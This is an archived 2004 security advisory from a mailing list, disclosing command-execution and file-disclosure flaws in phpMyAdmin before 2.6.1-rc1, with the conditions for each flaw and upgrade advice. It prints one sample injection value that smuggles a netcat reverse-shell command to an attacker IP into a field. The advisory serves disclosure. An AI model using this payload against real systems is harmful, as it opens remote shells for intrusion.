lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
From: ngregoire at (Nicolas Gregoire)
Subject: Multiple vulnerabilities in phpMyAdmin


                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148

Overview :

phpMyAdmin is a tool written in PHP intended to handle the 
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.

Technical details :

Command execution :

	- bug introduced in 2.6.0-pl2
	- attacker does *not* need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- external transformations must be activated
	- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

	- attacker need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- $cfg['UploadDir'] must be defined
	- exploitation is done via 'sql_localfile'

Vendor Response :

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two

Recommendation :

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.

CVE Information :

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (, which standardizes 
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin

Nicolas Gregoire ----- Consultant en S?curit? des Syst?mes d'Information ------[ ExaProbe ]------
PGP KeyID:CA61B44F  FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F

Powered by blists - more mailing lists